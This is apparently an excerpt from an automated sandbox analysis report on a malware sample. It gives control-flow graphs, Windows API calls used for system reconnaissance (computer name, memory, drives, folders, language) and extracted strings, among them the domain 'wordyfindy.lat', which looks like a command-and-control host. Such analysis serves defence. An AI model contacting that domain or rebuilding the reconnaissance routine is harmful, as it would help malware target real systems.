                                                                                                          • Instruction Fuzzy Hash: FDB1FDB08153408FE3549F168A89FA67FB1FB41610F1A82E8D6892F376C7359046CF99
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (+5=$_[\]$c;!3$k
                                                                                                          • API String ID: 0-739136296
                                                                                                          • Opcode ID: 0a98b8fb954435193cf11548583325256e5af4390f98cf0942261ce7db7d7155
                                                                                                          • Instruction ID: be5394ba620d37c46f93c1f86b7fdf0f292fa23c8a19d15e325f42d15eb26972
                                                                                                          • Opcode Fuzzy Hash: 0a98b8fb954435193cf11548583325256e5af4390f98cf0942261ce7db7d7155
                                                                                                          • Instruction Fuzzy Hash: 2CD204B1A083419FD724DF14D8917EBB7A2EFD5304F19892EE4D987391EB389841CB86

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 826 42bb35-42bb8f call 43b710 GetComputerNameExA 829 42bb90-42bbc2 826->829 829->829 830 42bbc4-42bbce 829->830 831 42bbd0-42bbd7 830->831 832 42bbeb-42bbf8 830->832 835 42bbe0-42bbe9 831->835 833 42bbfa-42bc01 832->833 834 42bc1b-42bc6f GetComputerNameExA 832->834 836 42bc10-42bc19 833->836 837 42bc70-42bc97 834->837 835->832 835->835 836->834 836->836 837->837 838 42bc99-42bca3 837->838 839 42bca5-42bcaf 838->839 840 42bcbb-42bcc8 838->840 841 42bcb0-42bcb9 839->841 842 42bcca-42bcd1 840->842 843 42bceb-42bd3a 840->843 841->840 841->841 844 42bce0-42bce9 842->844 846 42bd40-42bdaa 843->846 844->843 844->844 846->846 847 42bdac-42bdb6 846->847 848 42bdcb-42bdd8 847->848 849 42bdb8-42bdbf 847->849 851 42bdda-42bde1 848->851 852 42bdfb-42be5b call 43b710 848->852 850 42bdc0-42bdc9 849->850 850->848 850->850 853 42bdf0-42bdf9 851->853 857 42be60-42be97 852->857 853->852 853->853 857->857 858 42be99-42bea3 857->858 859 42bea5-42beaf 858->859 860 42bebb-42becb 858->860 861 42beb0-42beb9 859->861 862 42bed1-42bed8 860->862 863 42c00c-42c05f 860->863 861->860 861->861 864 42bee0-42bef1 862->864 865 42c060-42c0d4 863->865 866 42bef3-42bef8 864->866 867 42bf00-42bf06 864->867 865->865 868 42c0d6-42c0e4 865->868 869 42bf22 866->869 870 42bf50-42bf60 867->870 871 42bf08-42bf0b 867->871 872 42c0e6-42c0ef 868->872 873 42c0fb-42c0fe call 42f730 868->873 875 42bf26-42bf28 869->875 878 42bf62-42bf65 870->878 879 42bfba-42bfc2 870->879 871->870 874 42bf0d-42bf1f 871->874 876 42c0f0-42c0f9 872->876 881 42c103-42c123 873->881 874->869 880 42bf2a-42bf35 875->880 876->873 876->876 878->879 882 42bf67-42bfb5 878->882 883 42bfc4-42bfc8 879->883 884 42bfcd-42bfd2 879->884 880->863 887 42bf3b-42bf3d 880->887 882->875 883->880 885 42bfd4-42c000 884->885 886 42c005-42c007 884->886 885->869 886->869 887->864 888 42bf3f 887->888 888->863
                                                                                                          APIs
                                                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042BB69
                                                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042BC3D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ComputerName
                                                                                                          • String ID: ?$ORVM$k
                                                                                                          • API String ID: 3545744682-55357630
                                                                                                          • Opcode ID: 73dfd37667851e74edda8fc3058c4e3f1f03dbc8d35f20561cfc2b0e77526a58
                                                                                                          • Instruction ID: a29b1076b5d534e7c869dd0889cae0e0c31f9b92cc7d3506e2fb745c9de056f1
                                                                                                          • Opcode Fuzzy Hash: 73dfd37667851e74edda8fc3058c4e3f1f03dbc8d35f20561cfc2b0e77526a58
                                                                                                          • Instruction Fuzzy Hash: FCF109316083908ED735CF3994917ABBBE2EF93304F49855ED4D99B382CB398506CB96

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 889 408450-408461 call 4399d0 892 408467-40848f call 407e80 889->892 893 40878f-408791 ExitProcess 889->893 896 408490-4084ac 892->896 897 4084c6-4084d8 call 433260 896->897 898 4084ae-4084c4 896->898 901 408778-40877f 897->901 902 4084de-408516 GetCurrentProcessId GetCurrentThreadId 897->902 898->896 903 408781-408787 call 407e90 901->903 904 40878a call 439dd0 901->904 905 408518-40851b 902->905 906 40851d-408527 902->906 903->904 904->893 907 408529-40868d SHGetSpecialFolderPathW GetForegroundWindow 905->907 906->907 910 408693-408713 907->910 911 408715-40876c call 409a00 907->911 910->911 911->901 915 40876e call 40cb90 911->915 917 408773 call 40b710 915->917 917->901
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004084DE
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004084E8
                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408670
                                                                                                          • GetForegroundWindow.USER32 ref: 00408685
                                                                                                          • ExitProcess.KERNEL32 ref: 00408791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4063528623-0
                                                                                                          • Opcode ID: c353894f50ce8972ad68c2fd857375105b19d1d075451e42aa21559e8c926ac0
                                                                                                          • Instruction ID: 9667fcc959b4b6dc1b54f54df87a9097397fe8c2a1fd8efcf39382a549e4d989
                                                                                                          • Opcode Fuzzy Hash: c353894f50ce8972ad68c2fd857375105b19d1d075451e42aa21559e8c926ac0
                                                                                                          • Instruction Fuzzy Hash: 69813773F04B144BC318AE6DCD85256B6C69BC4720F1F863EA995EB3D1EDB89C044689

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 981 42c273-42c298 982 42c2a0-42c2c5 981->982 982->982 983 42c2c7-42c2d1 982->983 984 42c2d3-42c2da 983->984 985 42c2eb-42c2f7 983->985 986 42c2e0-42c2e9 984->986 987 42c311-42c35b call 43b710 GetPhysicallyInstalledSystemMemory call 41ddb0 985->987 988 42c2f9-42c2fb 985->988 986->985 986->986 994 42c360-42c37a 987->994 989 42c300-42c30d 988->989 989->989 991 42c30f 989->991 991->987 995 42c380-42c3aa 994->995 995->995 996 42c3ac-42c3df 995->996 997 42c3e0-42c419 996->997 997->997 998 42c41b-42c425 997->998 999 42c427-42c432 998->999 1000 42c44d 998->1000 1001 42c440-42c449 999->1001 1002 42c451-42c459 1000->1002 1001->1001 1003 42c44b 1001->1003 1004 42c46b-42c478 1002->1004 1005 42c45b-42c45f 1002->1005 1003->1002 1007 42c47a-42c481 1004->1007 1008 42c49b-42c4f1 1004->1008 1006 42c460-42c469 1005->1006 1006->1004 1006->1006 1009 42c490-42c499 1007->1009 1010 42c500-42c53c 1008->1010 1009->1008 1009->1009 1010->1010 1011 42c53e-42c548 1010->1011 1012 42c54a-42c551 1011->1012 1013 42c56b-42c578 1011->1013 1016 42c560-42c569 1012->1016 1014 42c57a-42c581 1013->1014 1015 42c59b-42c641 1013->1015 1017 42c590-42c599 1014->1017 1016->1013 1016->1016 1017->1015 1017->1017
                                                                                                          APIs
                                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C340
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                                          • String ID: 1;28$@DrE
                                                                                                          • API String ID: 3960555810-323544097
                                                                                                          • Opcode ID: 0f8b194f0c21809f1514294f958e23905b7d033346f1951e53f3f900afccc97f
                                                                                                          • Instruction ID: e90a8db1dd24a847bce801572203e7e30b4ca81ec031bd0f445cdaf47bf252ba
                                                                                                          • Opcode Fuzzy Hash: 0f8b194f0c21809f1514294f958e23905b7d033346f1951e53f3f900afccc97f
                                                                                                          • Instruction Fuzzy Hash: 7291C570A0C3A18FD725CF2990607ABBBE0AFD7304F58896ED4DD97382D6398405CB96

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1041 431a20-431b01 call 413f60 GetSystemMetrics * 2 1049 431b08-431b99 1041->1049
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                          • Opcode ID: 82e9c184c72eb2c3017187d96860f3a05c1327615be25ec44bc7f72acb1adda6
                                                                                                          • Instruction ID: 8f896a56011e874f0ac22bb7d3ffd9ac1f0091449a08859568974d1ee2c6626f
                                                                                                          • Opcode Fuzzy Hash: 82e9c184c72eb2c3017187d96860f3a05c1327615be25ec44bc7f72acb1adda6
                                                                                                          • Instruction Fuzzy Hash: 345165B4D142189FDB40EFACD985A9DBBF0BF48300F11852AE899E7350D734A949CF96

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1072 40cd9c-40cdaf 1073 40cdb0-40cdd6 1072->1073 1073->1073 1074 40cdd8-40ce03 call 4083d0 1073->1074 1077 40ce10-40ce7a 1074->1077 1077->1077 1078 40ce7c-40cebf 1077->1078 1079 40cec0-40ced2 1078->1079 1079->1079 1080 40ced4-40cedf 1079->1080 1081 40cee1-40cee5 1080->1081 1082 40cefb-40cf03 1080->1082 1083 40cef0-40cef9 1081->1083 1084 40cf05-40cf06 1082->1084 1085 40cf1b-40cf26 1082->1085 1083->1082 1083->1083 1086 40cf10-40cf19 1084->1086 1087 40cf28-40cf29 1085->1087 1088 40cf3b-40cf49 1085->1088 1086->1085 1086->1086 1089 40cf30-40cf39 1087->1089 1090 40cf5b-40d01f 1088->1090 1091 40cf4b-40cf4f 1088->1091 1089->1088 1089->1089 1093 40d020-40d03e 1090->1093 1092 40cf50-40cf59 1091->1092 1092->1090 1092->1092 1093->1093 1094 40d040-40d069 1093->1094 1095 40d070-40d0a0 1094->1095 1095->1095 1096 40d0a2-40d0ba call 40b740 1095->1096 1098 40d0bf-40d0e0 1096->1098
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: F^$I@$wordyfindy.lat
                                                                                                          • API String ID: 0-4220062908
                                                                                                          • Opcode ID: a32a9dc7eeddbedd839400483b8a8f963e09df8e8f66ea590f5c168d3f478726
                                                                                                          • Instruction ID: 75eab1f800014c43d20e1d7ee47c841900a1d79cf133a7cb46caa78cff4b730e
                                                                                                          • Opcode Fuzzy Hash: a32a9dc7eeddbedd839400483b8a8f963e09df8e8f66ea590f5c168d3f478726
                                                                                                          • Instruction Fuzzy Hash: 7191F3B1504B418FD725CF25C4D0222BBA2FF96304B2896ADC8D65F79AC739E847CB94

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1099 422b70-422bc6 1100 422bd0-422c01 1099->1100 1100->1100 1101 422c03-422c47 1100->1101 1103 422c50-422c79 1101->1103 1103->1103 1104 422c7b-422c85 1103->1104 1105 422cc3 1104->1105 1106 422e20-422e29 1104->1106 1107 422e10-422e17 1104->1107 1108 422ce1-422cea 1104->1108 1109 422cd4-422ce0 1104->1109 1110 422ccb-422cd1 call 407e90 1104->1110 1111 422c8c-422c92 1104->1111 1105->1110 1114 422e32 1106->1114 1115 422e2b-422e30 1106->1115 1107->1106 1112 422cf3 1108->1112 1113 422cec-422cf1 1108->1113 1110->1109 1116 422c94-422c99 1111->1116 1117 422c9b 1111->1117 1120 422cfa-422d38 call 407e80 1112->1120 1113->1120 1121 422e39-422edf call 407e80 1114->1121 1115->1121 1122 422c9e-422cbc call 407e80 1116->1122 1117->1122 1129 422d40-422d99 1120->1129 1130 422ee0-422ef2 1121->1130 1122->1105 1122->1106 1122->1107 1122->1108 1122->1109 1122->1110 1129->1129 1131 422d9b-422da7 1129->1131 1130->1130 1132 422ef4-422efc 1130->1132 1134 422dc1-422dcd 1131->1134 1135 422da9-422daf 1131->1135 1136 422f21-422f2d 1132->1136 1137 422efe-422f05 1132->1137 1139 422df1-422dfc call 43ce50 1134->1139 1140 422dcf-422dd3 1134->1140 1138 422db0-422dbf 1135->1138 1142 422f51-422f71 GetLogicalDrives call 43ce50 1136->1142 1143 422f2f-422f33 1136->1143 1141 422f10-422f1f 1137->1141 1138->1134 1138->1138 1148 422e01-422e09 1139->1148 1147 422de0-422def 1140->1147 1141->1136 1141->1141 1150 4231d3 1142->1150 1151 422f78-422f82 1142->1151 1145 422f40-422f4f 1143->1145 1145->1142 1145->1145 1147->1139 1147->1147 1148->1106 1148->1107 1150->1150 1151->1150
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: hj
                                                                                                          • API String ID: 0-289319137
                                                                                                          • Opcode ID: 06092fb294515c55c5d4a3f5c3932efb0bbda3695c8d00682d9ae413fd06b1e2
                                                                                                          • Instruction ID: 6db4e12933fac9534df6dc46ac26008168cc2cc32e36c67cb0ae1687d387ca35
                                                                                                          • Opcode Fuzzy Hash: 06092fb294515c55c5d4a3f5c3932efb0bbda3695c8d00682d9ae413fd06b1e2
                                                                                                          • Instruction Fuzzy Hash: 4AA12FB06083109FD310DF25E88162BBBE1FFC2719F45492DE9C58B351E7B89906CB96
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: %21&$7k2?
                                                                                                          • API String ID: 2994545307-1884281822
                                                                                                          • Opcode ID: 930b3360a6efd2680fb2cb1cd70fe06c79fa9c98ee51d43274cc8953844ec839
                                                                                                          • Instruction ID: 5d52432c800cdacfb670e5a342df8ffc1e1d0b16707e1f5283b95985476ea6f9
                                                                                                          • Opcode Fuzzy Hash: 930b3360a6efd2680fb2cb1cd70fe06c79fa9c98ee51d43274cc8953844ec839
                                                                                                          • Instruction Fuzzy Hash: DAB15C727087204BDB18CF24E85267B77A2EB95304F99853EE8468B381E73CDD05C39A
                                                                                                          APIs
                                                                                                          • LdrInitializeThunk.NTDLL(0043CC7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00439E9E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: cba`
                                                                                                          • API String ID: 2994545307-1926275841
                                                                                                          • Opcode ID: d4a85b7172948f4bea12838c8fcc7bd31e4b987d5751cebc0a3660dd60dd0943
                                                                                                          • Instruction ID: 374a5f874cfd158a3b85d986cfed74ed275997d30767ec8dfa56d2100d753f12
                                                                                                          • Opcode Fuzzy Hash: d4a85b7172948f4bea12838c8fcc7bd31e4b987d5751cebc0a3660dd60dd0943
                                                                                                          • Instruction Fuzzy Hash: 37417975A483049BD7249F65ECC0B7B73A1EBC8714F28463DEA8597390E378EC418299
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID: @
                                                                                                          • API String ID: 2994545307-2766056989
                                                                                                          • Opcode ID: 595c4cf52168e1c8f70d594c86d9093254b8886fdfff40591c1cb8232c0caa53
                                                                                                          • Instruction ID: a06c1eee6061ee24535d2978fd3956e2edeaf57007d92e1d03b94cafbaa0f768
                                                                                                          • Opcode Fuzzy Hash: 595c4cf52168e1c8f70d594c86d9093254b8886fdfff40591c1cb8232c0caa53
                                                                                                          • Instruction Fuzzy Hash: EE3144751083088BC324DF18D8C036FBBF4EF89358F15582DEA8587350E3399909CBA6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 0d0f987f95dd01dd346831f2cb683c5db04f0cbef699b3ab79e014dd58f733fa
                                                                                                          • Instruction ID: 2436c842486bb1e96b2bcf13ce04d2d6de09f4c838fc53b8f5828c2c40861213
                                                                                                          • Opcode Fuzzy Hash: 0d0f987f95dd01dd346831f2cb683c5db04f0cbef699b3ab79e014dd58f733fa
                                                                                                          • Instruction Fuzzy Hash: AE514876A083008FD7149E25CC80737F7A2EBD9310F29912EF4D587351DB78AD068B9A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f1ed21bcde79da64442d463aec10cc3b9dadccd5c46c1a199c4d32b7e0cbcbd
                                                                                                          • Instruction ID: 6a497f2cb0e8c500077d952929dfaf2e0669ff669a4a42970148ee42aef4ed29
                                                                                                          • Opcode Fuzzy Hash: 6f1ed21bcde79da64442d463aec10cc3b9dadccd5c46c1a199c4d32b7e0cbcbd
                                                                                                          • Instruction Fuzzy Hash: C34117796993406BD314DF50CC85B3B73A6E7C6310F29A53DA1D05B3D1DBB89C06871A

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1018 42d0be-42d121 call 43b710 1022 42d130-42d15f 1018->1022 1022->1022 1023 42d161-42d16d 1022->1023 1024 42d18b-42d198 1023->1024 1025 42d16f-42d178 1023->1025 1027 42d19a-42d1a1 1024->1027 1028 42d1bb-42d201 FreeLibrary call 43b710 1024->1028 1026 42d180-42d189 1025->1026 1026->1024 1026->1026 1029 42d1b0-42d1b9 1027->1029 1032 42d204-42d22f 1028->1032 1029->1028 1029->1029 1033 42d230-42d25f 1032->1033 1033->1033 1034 42d261-42d26d 1033->1034 1035 42d28b-42d298 1034->1035 1036 42d26f-42d278 1034->1036 1038 42d29a-42d2a1 1035->1038 1039 42d2bb-42d2dd FreeLibrary 1035->1039 1037 42d280-42d289 1036->1037 1037->1035 1037->1037 1040 42d2b0-42d2b9 1038->1040 1040->1039 1040->1040
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeLibrary
                                                                                                          • String ID: ,M
                                                                                                          • API String ID: 3664257935-1887782012
                                                                                                          • Opcode ID: bcae319345e45dec2ad11f2b745a52c673fdef0d70ad5114471494c41ca4e074
                                                                                                          • Instruction ID: 8a9bcac8137a288ba93459f6299049b64f6989e319f8128aa38dd281b9624f43
                                                                                                          • Opcode Fuzzy Hash: bcae319345e45dec2ad11f2b745a52c673fdef0d70ad5114471494c41ca4e074
                                                                                                          • Instruction Fuzzy Hash: 4A4145A09183D08AD3358B25C8907A7BFD1AFE7305F4889ADC5C997342CB794505CB2A
                                                                                                          APIs
                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040E583
                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040E6D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Initialize
                                                                                                          • String ID:
                                                                                                          • API String ID: 2538663250-0
                                                                                                          • Opcode ID: 4ec4d94ef6079043ec59ec138dd99814ed3f780f987ca9f5ef7e9121435fbe0b
                                                                                                          • Instruction ID: 4164ddfdc88b490302d945ec3b486a8cc48757e120ea965f99e69a823b98332c
                                                                                                          • Opcode Fuzzy Hash: 4ec4d94ef6079043ec59ec138dd99814ed3f780f987ca9f5ef7e9121435fbe0b
                                                                                                          • Instruction Fuzzy Hash: F341F9B4D10B40AFD370EF39CA0B7127EB4AB05210F50472DF9EA86AD4E631A4198BD7
                                                                                                          APIs
                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E2CD
                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040E2E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeSecurity
                                                                                                          • String ID:
                                                                                                          • API String ID: 640775948-0
                                                                                                          • Opcode ID: 163e2fae047e479bb7b8822df0f7d88409a06025b5b53c93555790a35607bab9
                                                                                                          • Instruction ID: 7dd079ca6c0b00bfe119d2ce5c251a467b928ebdf26a9ec64d4c380262400e15
                                                                                                          • Opcode Fuzzy Hash: 163e2fae047e479bb7b8822df0f7d88409a06025b5b53c93555790a35607bab9
                                                                                                          • Instruction Fuzzy Hash: 79E067343C83517AFA788754EC1BF143615A785F36F744324B3267D2F895E07141860D
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 0043A09A
                                                                                                          • GetForegroundWindow.USER32 ref: 0043A0B0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ForegroundWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2020703349-0
                                                                                                          • Opcode ID: 14f5f4c5a4343420db801557d15f6eadcf159b0f551794c97a88a86df3eb745b
                                                                                                          • Instruction ID: 89b964fe84dfd191995a888d2c3ffa47c60ec2d798a22e32195ce22058b22125
                                                                                                          • Opcode Fuzzy Hash: 14f5f4c5a4343420db801557d15f6eadcf159b0f551794c97a88a86df3eb745b
                                                                                                          • Instruction Fuzzy Hash: D4D05EB9911804ABCA049721FC4E42A7626DB4A209715B03BEC0386317DE3594098ACA
                                                                                                          APIs
                                                                                                          • GetUserDefaultUILanguage.KERNELBASE ref: 00434939
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DefaultLanguageUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 95929093-0
                                                                                                          • Opcode ID: 3be5474a19a54549e72ba839cbf42c6c32ad1d2b5223f09665ad6bb43b8c3284
                                                                                                          • Instruction ID: 12104e991fc1a53e7b22025024a683eababe2184b9e8a26e5a41f1d5fedeaa40
                                                                                                          • Opcode Fuzzy Hash: 3be5474a19a54549e72ba839cbf42c6c32ad1d2b5223f09665ad6bb43b8c3284
                                                                                                          • Instruction Fuzzy Hash: D0118B30A056948FCB19CB799D906DCBFF1AF8E311F1842ADD5AAE73D0D6345A018B25
                                                                                                          APIs
                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,00000000,00000000,?,00000000,0040B633,00000000,00000001), ref: 00439E22
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 99160e2cfeebd4b64f8057989e7cc1e869e6c857fe7cee9a818ec10a3bd0d788
                                                                                                          • Instruction ID: 08eb5d2289196739d45aa41d563c1dfc5806d12bc2e7e34de5559120fd7a7bad
                                                                                                          • Opcode Fuzzy Hash: 99160e2cfeebd4b64f8057989e7cc1e869e6c857fe7cee9a818ec10a3bd0d788
                                                                                                          • Instruction Fuzzy Hash: FCF0E9BA809B11EFCA105F25BC02A5B7765EFCFB51F02447AF80146112DB79D801C6AE
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_400000_external.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BlanketProxy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3890896728-0
                                                                                                          • Opcode ID: f9ddf4903803a66d5f46f6440834eb16b94f5d8e53697827fd9981f27561a418
                                                                                                          • Instruction ID: ba06c54068975d59ddc1d4b41db5d6714b927070dfb3565dd83874e0ed78d376
                                                                                                          • Opcode Fuzzy Hash: f9ddf4903803a66d5f46f6440834eb16b94f5d8e53697827fd9981f27561a418
                                                                                                          • Instruction Fuzzy Hash: 33F054B46097019FE354DF28D5A875ABBE0FF85308F118D1DE4AA8B391C7B5A548CF82
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.1995762833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
